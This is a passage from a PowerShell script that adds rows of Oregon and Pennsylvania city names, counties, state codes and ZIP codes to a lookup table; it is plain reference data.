point","Jackson","Oregon","OR","41","97524") + $null = $Cities.Rows.Add("Gold hill","Jackson","Oregon","OR","41","97525") + $null = $Cities.Rows.Add("Grants pass","Josephine","Oregon","OR","41","97526") + $null = $Cities.Rows.Add("Grants pass","Josephine","Oregon","OR","41","97527") + $null = $Cities.Rows.Add("Applegate","Jackson","Oregon","OR","41","97530") + $null = $Cities.Rows.Add("Kerby","Josephine","Oregon","OR","41","97531") + $null = $Cities.Rows.Add("Merlin","Josephine","Oregon","OR","41","97532") + $null = $Cities.Rows.Add("O brien","Josephine","Oregon","OR","41","97534") + $null = $Cities.Rows.Add("Phoenix","Jackson","Oregon","OR","41","97535") + $null = $Cities.Rows.Add("Prospect","Jackson","Oregon","OR","41","97536") + $null = $Cities.Rows.Add("Rogue river","Jackson","Oregon","OR","41","97537") + $null = $Cities.Rows.Add("Selma","Josephine","Oregon","OR","41","97538") + $null = $Cities.Rows.Add("Shady cove","Jackson","Oregon","OR","41","97539") + $null = $Cities.Rows.Add("Talent","Jackson","Oregon","OR","41","97540") + $null = $Cities.Rows.Add("Trail","Jackson","Oregon","OR","41","97541") + $null = $Cities.Rows.Add("Wilderville","Josephine","Oregon","OR","41","97543") + $null = $Cities.Rows.Add("Williams","Josephine","Oregon","OR","41","97544") + $null = $Cities.Rows.Add("Zcta 975hh","Jackson","Oregon","OR","41","975HH") + $null = $Cities.Rows.Add("Zcta 975xx","Jackson","Oregon","OR","41","975XX") + $null = $Cities.Rows.Add("Oretech","Klamath","Oregon","OR","41","97601") + $null = $Cities.Rows.Add("Klamath falls","Klamath","Oregon","OR","41","97603") + $null = $Cities.Rows.Add("Crater lake","Klamath","Oregon","OR","41","97604") + $null = $Cities.Rows.Add("Adel","Lake","Oregon","OR","41","97620") + $null = $Cities.Rows.Add("Beatty","Klamath","Oregon","OR","41","97621") + $null = $Cities.Rows.Add("Bly","Klamath","Oregon","OR","41","97622") + $null = $Cities.Rows.Add("Bonanza","Klamath","Oregon","OR","41","97623") + $null = $Cities.Rows.Add("Chiloquin","Klamath","Oregon","OR","41","97624") + $null = $Cities.Rows.Add("Dairy","Klamath","Oregon","OR","41","97625") + $null = $Cities.Rows.Add("Fort klamath","Klamath","Oregon","OR","41","97626") + $null = $Cities.Rows.Add("Keno","Klamath","Oregon","OR","41","97627") + $null = $Cities.Rows.Add("Lakeview","Lake","Oregon","OR","41","97630") + $null = $Cities.Rows.Add("Malin","Klamath","Oregon","OR","41","97632") + $null = $Cities.Rows.Add("Merrill","Klamath","Oregon","OR","41","97633") + $null = $Cities.Rows.Add("Midland","Klamath","Oregon","OR","41","97634") + $null = $Cities.Rows.Add("New pine creek","Lake","Oregon","OR","41","97635") + $null = $Cities.Rows.Add("Paisley","Lake","Oregon","OR","41","97636") + $null = $Cities.Rows.Add("Plush","Lake","Oregon","OR","41","97637") + $null = $Cities.Rows.Add("Silver lake","Lake","Oregon","OR","41","97638") + $null = $Cities.Rows.Add("Sprague river","Klamath","Oregon","OR","41","97639") + $null = $Cities.Rows.Add("Summer lake","Lake","Oregon","OR","41","97640") + $null = $Cities.Rows.Add("Christmas valley","Lake","Oregon","OR","41","97641") + $null = $Cities.Rows.Add("Zcta 976hh","Klamath","Oregon","OR","41","976HH") + $null = $Cities.Rows.Add("Zcta 976xx","Klamath","Oregon","OR","41","976XX") + $null = $Cities.Rows.Add("Bend","Deschutes","Oregon","OR","41","97701") + $null = $Cities.Rows.Add("Bend","Deschutes","Oregon","OR","41","97702") + $null = $Cities.Rows.Add("Sunriver","Deschutes","Oregon","OR","41","97707") + $null = $Cities.Rows.Add("Fields","Harney","Oregon","OR","41","97710") + $null = $Cities.Rows.Add("Ashwood","Jefferson","Oregon","OR","41","97711") + $null = $Cities.Rows.Add("Brothers","Deschutes","Oregon","OR","41","97712") + $null = $Cities.Rows.Add("Burns","Harney","Oregon","OR","41","97720") + $null = $Cities.Rows.Add("Princeton","Harney","Oregon","OR","41","97721") + $null = $Cities.Rows.Add("Diamond","Harney","Oregon","OR","41","97722") + $null = $Cities.Rows.Add("Camp sherman","Jefferson","Oregon","OR","41","97730") + $null = $Cities.Rows.Add("Diamond lake","Klamath","Oregon","OR","41","97731") + $null = $Cities.Rows.Add("Crane","Harney","Oregon","OR","41","97732") + $null = $Cities.Rows.Add("Crescent","Klamath","Oregon","OR","41","97733") + $null = $Cities.Rows.Add("Culver","Jefferson","Oregon","OR","41","97734") + $null = $Cities.Rows.Add("Fort rock","Lake","Oregon","OR","41","97735") + $null = $Cities.Rows.Add("Frenchglen","Harney","Oregon","OR","41","97736") + $null = $Cities.Rows.Add("Gilchrist","Klamath","Oregon","OR","41","97737") + $null = $Cities.Rows.Add("Hines","Harney","Oregon","OR","41","97738") + $null = $Cities.Rows.Add("La pine","Deschutes","Oregon","OR","41","97739") + $null = $Cities.Rows.Add("Madras","Jefferson","Oregon","OR","41","97741") + $null = $Cities.Rows.Add("Mitchell","Wheeler","Oregon","OR","41","97750") + $null = $Cities.Rows.Add("Paulina","Crook","Oregon","OR","41","97751") + $null = $Cities.Rows.Add("Post","Crook","Oregon","OR","41","97752") + $null = $Cities.Rows.Add("Powell butte","Crook","Oregon","OR","41","97753") + $null = $Cities.Rows.Add("Prineville","Crook","Oregon","OR","41","97754") + $null = $Cities.Rows.Add("Redmond","Deschutes","Oregon","OR","41","97756") + $null = $Cities.Rows.Add("Riley","Harney","Oregon","OR","41","97758") + $null = $Cities.Rows.Add("Black butte ranc","Deschutes","Oregon","OR","41","97759") + $null = $Cities.Rows.Add("Crooked river ra","Jefferson","Oregon","OR","41","97760") + $null = $Cities.Rows.Add("Warm springs","Jefferson","Oregon","OR","41","97761") + $null = $Cities.Rows.Add("Zcta 977hh","Deschutes","Oregon","OR","41","977HH") + $null = $Cities.Rows.Add("Zcta 977xx","Jefferson","Oregon","OR","41","977XX") + $null = $Cities.Rows.Add("Pendleton","Umatilla","Oregon","OR","41","97801") + $null = $Cities.Rows.Add("Adams","Umatilla","Oregon","OR","41","97810") + $null = $Cities.Rows.Add("Arlington","Gilliam","Oregon","OR","41","97812") + $null = $Cities.Rows.Add("Athena","Umatilla","Oregon","OR","41","97813") + $null = $Cities.Rows.Add("Medical springs","Baker","Oregon","OR","41","97814") + $null = $Cities.Rows.Add("Bates","Grant","Oregon","OR","41","97817") + $null = $Cities.Rows.Add("Boardman","Morrow","Oregon","OR","41","97818") + $null = $Cities.Rows.Add("Bridgeport","Baker","Oregon","OR","41","97819") + $null = $Cities.Rows.Add("Canyon city","Grant","Oregon","OR","41","97820") + $null = $Cities.Rows.Add("Condon","Gilliam","Oregon","OR","41","97823") + $null = $Cities.Rows.Add("Cove","Union","Oregon","OR","41","97824") + $null = $Cities.Rows.Add("Dayville","Grant","Oregon","OR","41","97825") + $null = $Cities.Rows.Add("Echo","Umatilla","Oregon","OR","41","97826") + $null = $Cities.Rows.Add("Elgin","Union","Oregon","OR","41","97827") + $null = $Cities.Rows.Add("Enterprise","Wallowa","Oregon","OR","41","97828") + $null = $Cities.Rows.Add("Kinzua","Wheeler","Oregon","OR","41","97830") + $null = $Cities.Rows.Add("Haines","Baker","Oregon","OR","41","97833") + $null = $Cities.Rows.Add("Halfway","Baker","Oregon","OR","41","97834") + $null = $Cities.Rows.Add("Helix","Umatilla","Oregon","OR","41","97835") + $null = $Cities.Rows.Add("Heppner","Morrow","Oregon","OR","41","97836") + $null = $Cities.Rows.Add("Hereford","Baker","Oregon","OR","41","97837") + $null = $Cities.Rows.Add("Hermiston","Umatilla","Oregon","OR","41","97838") + $null = $Cities.Rows.Add("Lexington","Morrow","Oregon","OR","41","97839") + $null = $Cities.Rows.Add("Oxbow","Baker","Oregon","OR","41","97840") + $null = $Cities.Rows.Add("Imbler","Union","Oregon","OR","41","97841") + $null = $Cities.Rows.Add("Imnaha","Wallowa","Oregon","OR","41","97842") + $null = $Cities.Rows.Add("Ione","Morrow","Oregon","OR","41","97843") + $null = $Cities.Rows.Add("Irrigon","Morrow","Oregon","OR","41","97844") + $null = $Cities.Rows.Add("John day","Grant","Oregon","OR","41","97845") + $null = $Cities.Rows.Add("Joseph","Wallowa","Oregon","OR","41","97846") + $null = $Cities.Rows.Add("Kimberly","Grant","Oregon","OR","41","97848") + $null = $Cities.Rows.Add("La grande","Union","Oregon","OR","41","97850") + $null = $Cities.Rows.Add("Long creek","Grant","Oregon","OR","41","97856") + $null = $Cities.Rows.Add("Lostine","Wallowa","Oregon","OR","41","97857") + $null = $Cities.Rows.Add("Meacham","Umatilla","Oregon","OR","41","97859") + $null = $Cities.Rows.Add("Milton freewater","Umatilla","Oregon","OR","41","97862") + $null = $Cities.Rows.Add("Monument","Grant","Oregon","OR","41","97864") + $null = $Cities.Rows.Add("Mount vernon","Grant","Oregon","OR","41","97865") + $null = $Cities.Rows.Add("North powder","Union","Oregon","OR","41","97867") + $null = $Cities.Rows.Add("Pilot rock","Umatilla","Oregon","OR","41","97868") + $null = $Cities.Rows.Add("Prairie city","Grant","Oregon","OR","41","97869") + $null = $Cities.Rows.Add("Richland","Baker","Oregon","OR","41","97870") + $null = $Cities.Rows.Add("Ritter","Grant","Oregon","OR","41","97872") + $null = $Cities.Rows.Add("Seneca","Grant","Oregon","OR","41","97873") + $null = $Cities.Rows.Add("Spray","Wheeler","Oregon","OR","41","97874") + $null = $Cities.Rows.Add("Stanfield","Umatilla","Oregon","OR","41","97875") + $null = $Cities.Rows.Add("Summerville","Union","Oregon","OR","41","97876") + $null = $Cities.Rows.Add("Sumpter","Baker","Oregon","OR","41","97877") + $null = $Cities.Rows.Add("Dale","Umatilla","Oregon","OR","41","97880") + $null = $Cities.Rows.Add("Mcnary","Umatilla","Oregon","OR","41","97882") + $null = $Cities.Rows.Add("Union","Union","Oregon","OR","41","97883") + $null = $Cities.Rows.Add("Unity","Baker","Oregon","OR","41","97884") + $null = $Cities.Rows.Add("Wallowa","Wallowa","Oregon","OR","41","97885") + $null = $Cities.Rows.Add("Weston","Umatilla","Oregon","OR","41","97886") + $null = $Cities.Rows.Add("Zcta 978hh","Baker","Oregon","OR","41","978HH") + $null = $Cities.Rows.Add("Zcta 978xx","Grant","Oregon","OR","41","978XX") + $null = $Cities.Rows.Add("Adrian","Malheur","Oregon","OR","41","97901") + $null = $Cities.Rows.Add("Brogan","Malheur","Oregon","OR","41","97903") + $null = $Cities.Rows.Add("Drewsey","Harney","Oregon","OR","41","97904") + $null = $Cities.Rows.Add("Durkee","Baker","Oregon","OR","41","97905") + $null = $Cities.Rows.Add("Harper","Malheur","Oregon","OR","41","97906") + $null = $Cities.Rows.Add("Huntington","Baker","Oregon","OR","41","97907") + $null = $Cities.Rows.Add("Ironside","Malheur","Oregon","OR","41","97908") + $null = $Cities.Rows.Add("Jamieson","Malheur","Oregon","OR","41","97909") + $null = $Cities.Rows.Add("Jordan valley","Malheur","Oregon","OR","41","97910") + $null = $Cities.Rows.Add("Juntura","Malheur","Oregon","OR","41","97911") + $null = $Cities.Rows.Add("Nyssa","Malheur","Oregon","OR","41","97913") + $null = $Cities.Rows.Add("Ontario","Malheur","Oregon","OR","41","97914") + $null = $Cities.Rows.Add("Vale","Malheur","Oregon","OR","41","97918") + $null = $Cities.Rows.Add("Westfall","Malheur","Oregon","OR","41","97920") + $null = $Cities.Rows.Add("Zcta 979hh","Baker","Oregon","OR","41","979HH") + $null = $Cities.Rows.Add("Zcta 979xx","Malheur","Oregon","OR","41","979XX") + $null = $Cities.Rows.Add("","Umatilla","Oregon","OR","41","99362") + $null = $Cities.Rows.Add("Macarthur","Beaver","Pennsylvania","PA","42","15001") + $null = $Cities.Rows.Add("Fairoaks","Beaver","Pennsylvania","PA","42","15003") + $null = $Cities.Rows.Add("Atlasburg","Washington","Pennsylvania","PA","42","15004") + $null = $Cities.Rows.Add("Baden","Beaver","Pennsylvania","PA","42","15005") + $null = $Cities.Rows.Add("Bairdford","Allegheny","Pennsylvania","PA","42","15006") + $null = $Cities.Rows.Add("Bakerstown","Allegheny","Pennsylvania","PA","42","15007") + $null = $Cities.Rows.Add("Beaver","Beaver","Pennsylvania","PA","42","15009") + $null = $Cities.Rows.Add("Racine","Beaver","Pennsylvania","PA","42","15010") + $null = $Cities.Rows.Add("Rostraver","Westmoreland","Pennsylvania","PA","42","15012") + $null = $Cities.Rows.Add("Brackenridge","Allegheny","Pennsylvania","PA","42","15014") + $null = $Cities.Rows.Add("Bradfordwoods","Allegheny","Pennsylvania","PA","42","15015") + $null = $Cities.Rows.Add("Bridgeville","Allegheny","Pennsylvania","PA","42","15017") + $null = $Cities.Rows.Add("Buena vista","Allegheny","Pennsylvania","PA","42","15018") + $null = $Cities.Rows.Add("Bulger","Washington","Pennsylvania","PA","42","15019") + $null = $Cities.Rows.Add("Bunola","Allegheny","Pennsylvania","PA","42","15020") + $null = $Cities.Rows.Add("Paris","Washington","Pennsylvania","PA","42","15021") + $null = $Cities.Rows.Add("Charleroi","Washington","Pennsylvania","PA","42","15022") + $null = $Cities.Rows.Add("Cheswick","Allegheny","Pennsylvania","PA","42","15024") + $null = $Cities.Rows.Add("Large","Allegheny","Pennsylvania","PA","42","15025") + $null = $Cities.Rows.Add("Clinton","Beaver","Pennsylvania","PA","42","15026") + $null = $Cities.Rows.Add("Conway","Beaver","Pennsylvania","PA","42","15027") + $null = $Cities.Rows.Add("Coulters","Allegheny","Pennsylvania","PA","42","15028") + $null = $Cities.Rows.Add("Creighton","Allegheny","Pennsylvania","PA","42","15030") + $null = $Cities.Rows.Add("Cuddy","Allegheny","Pennsylvania","PA","42","15031") + $null = $Cities.Rows.Add("Donora","Washington","Pennsylvania","PA","42","15033") + $null = $Cities.Rows.Add("Dravosburg","Allegheny","Pennsylvania","PA","42","15034") + $null = $Cities.Rows.Add("East mc keesport","Allegheny","Pennsylvania","PA","42","15035") + $null = $Cities.Rows.Add("Elizabeth","Allegheny","Pennsylvania","PA","42","15037") + $null = $Cities.Rows.Add("Elrama","Washington","Pennsylvania","PA","42","15038") + $null = $Cities.Rows.Add("Freedom","Beaver","Pennsylvania","PA","42","15042") + $null = $Cities.Rows.Add("Georgetown","Beaver","Pennsylvania","PA","42","15043") + $null = $Cities.Rows.Add("Gibsonia","Allegheny","Pennsylvania","PA","42","15044") + $null = $Cities.Rows.Add("Glassport","Allegheny","Pennsylvania","PA","42","15045") + $null = $Cities.Rows.Add("Glenwillard","Allegheny","Pennsylvania","PA","42","15046") + $null = $Cities.Rows.Add("Harwick","Allegheny","Pennsylvania","PA","42","15049") + $null = $Cities.Rows.Add("Hookstown","Beaver","Pennsylvania","PA","42","15050") + $null = $Cities.Rows.Add("Indianola","Allegheny","Pennsylvania","PA","42","15051") + $null = $Cities.Rows.Add("Industry","Beaver","Pennsylvania","PA","42","15052") + $null = $Cities.Rows.Add("Joffre","Washington","Pennsylvania","PA","42","15053") + $null = $Cities.Rows.Add("Langeloth","Washington","Pennsylvania","PA","42","15054") + $null = $Cities.Rows.Add("Lawrence","Washington","Pennsylvania","PA","42","15055") + $null = $Cities.Rows.Add("Leetsdale","Allegheny","Pennsylvania","PA","42","15056") + $null = $Cities.Rows.Add("Mc donald","Washington","Pennsylvania","PA","42","15057") + $null = $Cities.Rows.Add("Midland","Beaver","Pennsylvania","PA","42","15059") + $null = $Cities.Rows.Add("Midway","Washington","Pennsylvania","PA","42","15060") + $null = $Cities.Rows.Add("Monaca","Beaver","Pennsylvania","PA","42","15061") + $null = $Cities.Rows.Add("Monessen","Westmoreland","Pennsylvania","PA","42","15062") + $null = $Cities.Rows.Add("Monongahela","Washington","Pennsylvania","PA","42","15063") + $null = $Cities.Rows.Add("Morgan","Allegheny","Pennsylvania","PA","42","15064") + $null = $Cities.Rows.Add("Natrona","Allegheny","Pennsylvania","PA","42","15065") + $null = $Cities.Rows.Add("New brighton","Beaver","Pennsylvania","PA","42","15066") + $null = $Cities.Rows.Add("New eagle","Washington","Pennsylvania","PA","42","15067") + $null = $Cities.Rows.Add("Arnold","Westmoreland","Pennsylvania","PA","42","15068") + $null = $Cities.Rows.Add("Noblestown","Allegheny","Pennsylvania","PA","42","15071") + $null = $Cities.Rows.Add("Pricedale","Westmoreland","Pennsylvania","PA","42","15072") + $null = $Cities.Rows.Add("Rochester","Beaver","Pennsylvania","PA","42","15074") + $null = $Cities.Rows.Add("Rural ridge","Allegheny","Pennsylvania","PA","42","15075") + $null = $Cities.Rows.Add("Russellton","Allegheny","Pennsylvania","PA","42","15076") + $null = $Cities.Rows.Add("Slovan","Washington","Pennsylvania","PA","42","15078") + $null = $Cities.Rows.Add("South heights","Beaver","Pennsylvania","PA","42","15081") + $null = $Cities.Rows.Add("Sturgeon","Allegheny","Pennsylvania","PA","42","15082") + $null = $Cities.Rows.Add("Sutersville","Westmoreland","Pennsylvania","PA","42","15083") + $null = $Cities.Rows.Add("Tarentum","Allegheny","Pennsylvania","PA","42","15084") + $null = $Cities.Rows.Add("Level green","Westmoreland","Pennsylvania","PA","42","15085") + $null = $Cities.Rows.Add("Warrendale","Allegheny","Pennsylvania","PA","42","15086") + $null = $Cities.Rows.Add("Webster","Westmoreland","Pennsylvania","PA","42","15087") + $null = $Cities.Rows.Add("West elizabeth","Allegheny","Pennsylvania","PA","42","15088") + $null = $Cities.Rows.Add("West newton","Westmoreland","Pennsylvania","PA","42","15089") + $null = $Cities.Rows.Add("Wexford","Allegheny","Pennsylvania","PA","42","15090") + $null = $Cities.Rows.Add("Zcta 150hh","Allegheny","Pennsylvania","PA","42","150HH") + $null = $Cities.Rows.Add("Allison park","Allegheny","Pennsylvania","PA","42","15101") + $null = $Cities.Rows.Add("Bethel park","Allegheny","Pennsylvania","PA","42","15102") + $null = $Cities.Rows.Add("Rankin","Allegheny","Pennsylvania","PA","42","15104") + $null = $Cities.Rows.Add("Carnegie","Allegheny","Pennsylvania","PA","42","15106") + $null = $Cities.Rows.Add("Moon twp","Allegheny","Pennsylvania","PA","42","15108") + $null = $Cities.Rows.Add("Duquesne","Allegheny","Pennsylvania","PA","42","15110") + $null = $Cities.Rows.Add("East pittsburgh","Allegheny","Pennsylvania","PA","42","15112") + $null = $Cities.Rows.Add("Glenshaw","Allegheny","Pennsylvania","PA","42","15116") + $null = $Cities.Rows.Add("Munhall","Allegheny","Pennsylvania","PA","42","15120") + $null = $Cities.Rows.Add("W mifflin fin","Allegheny","Pennsylvania","PA","42","15122") + $null = $Cities.Rows.Add("Imperial","Allegheny","Pennsylvania","PA","42","15126") + $null = $Cities.Rows.Add("Library","Allegheny","Pennsylvania","PA","42","15129") + $null = $Cities.Rows.Add("White oak","Allegheny","Pennsylvania","PA","42","15131") + $null = $Cities.Rows.Add("Mc keesport","Allegheny","Pennsylvania","PA","42","15132") + $null = $Cities.Rows.Add("Mc keesport","Allegheny","Pennsylvania","PA","42","15133") + $null = $Cities.Rows.Add("Boston","Allegheny","Pennsylvania","PA","42","15135") + $null = $Cities.Rows.Add("Mc kees rocks","Allegheny","Pennsylvania","PA","42","15136") + $null = $Cities.Rows.Add("North versailles","Allegheny","Pennsylvania","PA","42","15137") + $null = $Cities.Rows.Add("Oakmont","Allegheny","Pennsylvania","PA","42","15139") + $null = $Cities.Rows.Add("Pitcairn","Allegheny","Pennsylvania","PA","42","15140") + $null = $Cities.Rows.Add("Presto","Allegheny","Pennsylvania","PA","42","15142") + $null = $Cities.Rows.Add("Sewickley","Allegheny","Pennsylvania","PA","42","15143") + $null = $Cities.Rows.Add("Springdale","Allegheny","Pennsylvania","PA","42","15144") + $null = $Cities.Rows.Add("Turtle creek","Allegheny","Pennsylvania","PA","42","15145") + $null = $Cities.Rows.Add("Monroeville","Allegheny","Pennsylvania","PA","42","15146") + $null = $Cities.Rows.Add("Verona","Allegheny","Pennsylvania","PA","42","15147") + $null = $Cities.Rows.Add("Wall","Allegheny","Pennsylvania","PA","42","15148") + $null = $Cities.Rows.Add("Zcta 151hh","Allegheny","Pennsylvania","PA","42","151HH") + $null = $Cities.Rows.Add("Arsenal","Allegheny","Pennsylvania","PA","42","15201") + $null = $Cities.Rows.Add("Bellevue","Allegheny","Pennsylvania","PA","42","15202") + $null = $Cities.Rows.Add("Carson","Allegheny","Pennsylvania","PA","42","15203") + $null = $Cities.Rows.Add("Corliss","Allegheny","Pennsylvania","PA","42","15204") + $null = $Cities.Rows.Add("Crafton","Allegheny","Pennsylvania","PA","42","15205") + $null = $Cities.Rows.Add("East liberty","Allegheny","Pennsylvania","PA","42","15206") + $null = $Cities.Rows.Add("Hazelwood","Allegheny","Pennsylvania","PA","42","15207") + $null = $Cities.Rows.Add("Homewood","Allegheny","Pennsylvania","PA","42","15208") + $null = $Cities.Rows.Add("Millvale","Allegheny","Pennsylvania","PA","42","15209") + $null = $Cities.Rows.Add("Mount oliver","Allegheny","Pennsylvania","PA","42","15210") + $null = $Cities.Rows.Add("Mount washington","Allegheny","Pennsylvania","PA","42","15211") + $null = $Cities.Rows.Add("Allegheny","Allegheny","Pennsylvania","PA","42","15212") + $null = $Cities.Rows.Add("Oakland","Allegheny","Pennsylvania","PA","42","15213") + $null = $Cities.Rows.Add("Observatory","Allegheny","Pennsylvania","PA","42","15214") + $null = $Cities.Rows.Add("Aspinwall","Allegheny","Pennsylvania","PA","42","15215") + $null = $Cities.Rows.Add("South hills","Allegheny","Pennsylvania","PA","42","15216") + $null = $Cities.Rows.Add("Squirrel hill","Allegheny","Pennsylvania","PA","42","15217") + $null = $Cities.Rows.Add("Swissvale","Allegheny","Pennsylvania","PA","42","15218") + $null = $Cities.Rows.Add("Uptown","Allegheny","Pennsylvania","PA","42","15219") + $null = $Cities.Rows.Add("Parkway center","Allegheny","Pennsylvania","PA","42","15220") + $null = $Cities.Rows.Add("Wilkinsburg","Allegheny","Pennsylvania","PA","42","15221") + $null = $Cities.Rows.Add("Downtown","Allegheny","Pennsylvania","PA","42","15222") + $null = $Cities.Rows.Add("Etna","Allegheny","Pennsylvania","PA","42","15223") + $null = $Cities.Rows.Add("Bloomfield","Allegheny","Pennsylvania","PA","42","15224") + $null = $Cities.Rows.Add("Neville island","Allegheny","Pennsylvania","PA","42","15225") + $null = $Cities.Rows.Add("Brookline","Allegheny","Pennsylvania","PA","42","15226") + $null = $Cities.Rows.Add("Brentwood","Allegheny","Pennsylvania","PA","42","15227") + $null = $Cities.Rows.Add("Mount lebanon","Allegheny","Pennsylvania","PA","42","15228") + $null = $Cities.Rows.Add("West view","Allegheny","Pennsylvania","PA","42","15229") + $null = $Cities.Rows.Add("Shadyside","Allegheny","Pennsylvania","PA","42","15232") + $null = $Cities.Rows.Add("Kilbuck","Allegheny","Pennsylvania","PA","42","15233") + $null = $Cities.Rows.Add("Castle shannon","Allegheny","Pennsylvania","PA","42","15234") + $null = $Cities.Rows.Add("Penn hills","Allegheny","Pennsylvania","PA","42","15235") + $null = $Cities.Rows.Add("Caste village","Allegheny","Pennsylvania","PA","42","15236") + $null = $Cities.Rows.Add("Mc knight","Allegheny","Pennsylvania","PA","42","15237") + $null = $Cities.Rows.Add("Blawnox","Allegheny","Pennsylvania","PA","42","15238") + $null = $Cities.Rows.Add("Plum","Allegheny","Pennsylvania","PA","42","15239") + $null = $Cities.Rows.Add("Upper saint clai","Allegheny","Pennsylvania","PA","42","15241") + $null = $Cities.Rows.Add("Cedarhurst","Allegheny","Pennsylvania","PA","42","15243") + $null = $Cities.Rows.Add("Zcta 152hh","Allegheny","Pennsylvania","PA","42","152HH") + $null = $Cities.Rows.Add("Washington","Washington","Pennsylvania","PA","42","15301") + $null = $Cities.Rows.Add("Aleppo","Greene","Pennsylvania","PA","42","15310") + $null = $Cities.Rows.Add("Amity","Washington","Pennsylvania","PA","42","15311") + $null = $Cities.Rows.Add("Avella","Washington","Pennsylvania","PA","42","15312") + $null = $Cities.Rows.Add("Beallsville","Washington","Pennsylvania","PA","42","15313") + $null = $Cities.Rows.Add("Bentleyville","Washington","Pennsylvania","PA","42","15314") + $null = $Cities.Rows.Add("Bobtown","Greene","Pennsylvania","PA","42","15315") + $null = $Cities.Rows.Add("Brave","Greene","Pennsylvania","PA","42","15316") + $null = $Cities.Rows.Add("Mc murray","Washington","Pennsylvania","PA","42","15317") + $null = $Cities.Rows.Add("Carmichaels","Greene","Pennsylvania","PA","42","15320") + $null = $Cities.Rows.Add("Cecil","Washington","Pennsylvania","PA","42","15321") + $null = $Cities.Rows.Add("Clarksville","Greene","Pennsylvania","PA","42","15322") + $null = $Cities.Rows.Add("Claysville","Washington","Pennsylvania","PA","42","15323") + $null = $Cities.Rows.Add("Cokeburg","Washington","Pennsylvania","PA","42","15324") + $null = $Cities.Rows.Add("Crucible","Greene","Pennsylvania","PA","42","15325") + $null = $Cities.Rows.Add("Dilliner","Greene","Pennsylvania","PA","42","15327") + $null = $Cities.Rows.Add("Prosperity","Washington","Pennsylvania","PA","42","15329") + $null = $Cities.Rows.Add("Eighty four","Washington","Pennsylvania","PA","42","15330") + $null = $Cities.Rows.Add("Ellsworth","Washington","Pennsylvania","PA","42","15331") + $null = $Cities.Rows.Add("Finleyville","Washington","Pennsylvania","PA","42","15332") + $null = $Cities.Rows.Add("Fredericktown","Washington","Pennsylvania","PA","42","15333") + $null = $Cities.Rows.Add("Garards fort","Greene","Pennsylvania","PA","42","15334") + $null = $Cities.Rows.Add("Graysville","Greene","Pennsylvania","PA","42","15337") + $null = $Cities.Rows.Add("Greensboro","Greene","Pennsylvania","PA","42","15338") + $null = $Cities.Rows.Add("Hickory","Washington","Pennsylvania","PA","42","15340") + $null = $Cities.Rows.Add("Holbrook","Greene","Pennsylvania","PA","42","15341") + $null = $Cities.Rows.Add("Houston","Washington","Pennsylvania","PA","42","15342") + $null = $Cities.Rows.Add("Jefferson","Greene","Pennsylvania","PA","42","15344") + $null = $Cities.Rows.Add("Marianna","Washington","Pennsylvania","PA","42","15345") + $null = $Cities.Rows.Add("Mather","Greene","Pennsylvania","PA","42","15346") + $null = $Cities.Rows.Add("Meadow lands","Washington","Pennsylvania","PA","42","15347") + $null = $Cities.Rows.Add("Millsboro","Washington","Pennsylvania","PA","42","15348") + $null = $Cities.Rows.Add("Davistown","Greene","Pennsylvania","PA","42","15349") + $null = $Cities.Rows.Add("Muse","Washington","Pennsylvania","PA","42","15350") + $null = $Cities.Rows.Add("Nemacolin","Greene","Pennsylvania","PA","42","15351") + $null = $Cities.Rows.Add("New freeport","Greene","Pennsylvania","PA","42","15352") + $null = $Cities.Rows.Add("Nineveh","Greene","Pennsylvania","PA","42","15353") + $null = $Cities.Rows.Add("Rices landing","Greene","Pennsylvania","PA","42","15357") + $null = $Cities.Rows.Add("Richeyville","Washington","Pennsylvania","PA","42","15358") + $null = $Cities.Rows.Add("Rogersville","Greene","Pennsylvania","PA","42","15359") + $null = $Cities.Rows.Add("Scenery hill","Washington","Pennsylvania","PA","42","15360") + $null = $Cities.Rows.Add("Southview","Washington","Pennsylvania","PA","42","15361") + $null = $Cities.Rows.Add("Spraggs","Greene","Pennsylvania","PA","42","15362") + $null = $Cities.Rows.Add("Strabane","Washington","Pennsylvania","PA","42","15363") + $null = $Cities.Rows.Add("Sycamore","Greene","Pennsylvania","PA","42","15364") + $null = $Cities.Rows.Add("Venetia","Washington","Pennsylvania","PA","42","15367") + $null = $Cities.Rows.Add("Vestaburg","Washington","Pennsylvania","PA","42","15368") + $null = $Cities.Rows.Add("Waynesburg","Greene","Pennsylvania","PA","42","15370") + $null = $Cities.Rows.Add("West alexander","Washington","Pennsylvania","PA","42","15376") + $null = $Cities.Rows.Add("West finley","Washington","Pennsylvania","PA","42","15377") + $null = $Cities.Rows.Add("Westland","Washington","Pennsylvania","PA","42","15378") + $null = $Cities.Rows.Add("West middletown","Washington","Pennsylvania","PA","42","15379") + $null = $Cities.Rows.Add("Wind ridge","Greene","Pennsylvania","PA","42","15380") + $null = $Cities.Rows.Add("Zcta 153hh","Greene","Pennsylvania","PA","42","153HH") + $null = $Cities.Rows.Add("Uniontown","Fayette","Pennsylvania","PA","42","15401") + $null = $Cities.Rows.Add("Adah","Fayette","Pennsylvania","PA","42","15410") + $null = $Cities.Rows.Add("Addison","Somerset","Pennsylvania","PA","42","15411") + $null = $Cities.Rows.Add("Allenport","Washington","Pennsylvania","PA","42","15412") + $null = $Cities.Rows.Add("Allison","Fayette","Pennsylvania","PA","42","15413") + $null = $Cities.Rows.Add("West brownsville","Fayette","Pennsylvania","PA","42","15417") + $null = $Cities.Rows.Add("California","Washington","Pennsylvania","PA","42","15419") + $null = $Cities.Rows.Add("Cardale","Fayette","Pennsylvania","PA","42","15420") + $null = $Cities.Rows.Add("Chestnut ridge","Fayette","Pennsylvania","PA","42","15422") + $null = $Cities.Rows.Add("Coal center","Washington","Pennsylvania","PA","42","15423") + $null = $Cities.Rows.Add("Listonburg","Somerset","Pennsylvania","PA","42","15424") + $null = $Cities.Rows.Add("South connellsvi","Fayette","Pennsylvania","PA","42","15425") + $null = $Cities.Rows.Add("Daisytown","Washington","Pennsylvania","PA","42","15427") + $null = $Cities.Rows.Add("Dawson","Fayette","Pennsylvania","PA","42","15428") + $null = $Cities.Rows.Add("Denbo","Washington","Pennsylvania","PA","42","15429") + $null = $Cities.Rows.Add("Dickerson run","Fayette","Pennsylvania","PA","42","15430") + $null = $Cities.Rows.Add("Dunbar","Fayette","Pennsylvania","PA","42","15431") + $null = $Cities.Rows.Add("Dunlevy","Washington","Pennsylvania","PA","42","15432") + $null = $Cities.Rows.Add("East millsboro","Fayette","Pennsylvania","PA","42","15433") + $null = $Cities.Rows.Add("Elco","Washington","Pennsylvania","PA","42","15434") + $null = $Cities.Rows.Add("Fairchance","Fayette","Pennsylvania","PA","42","15436") + $null = $Cities.Rows.Add("Farmington","Fayette","Pennsylvania","PA","42","15437") + $null = 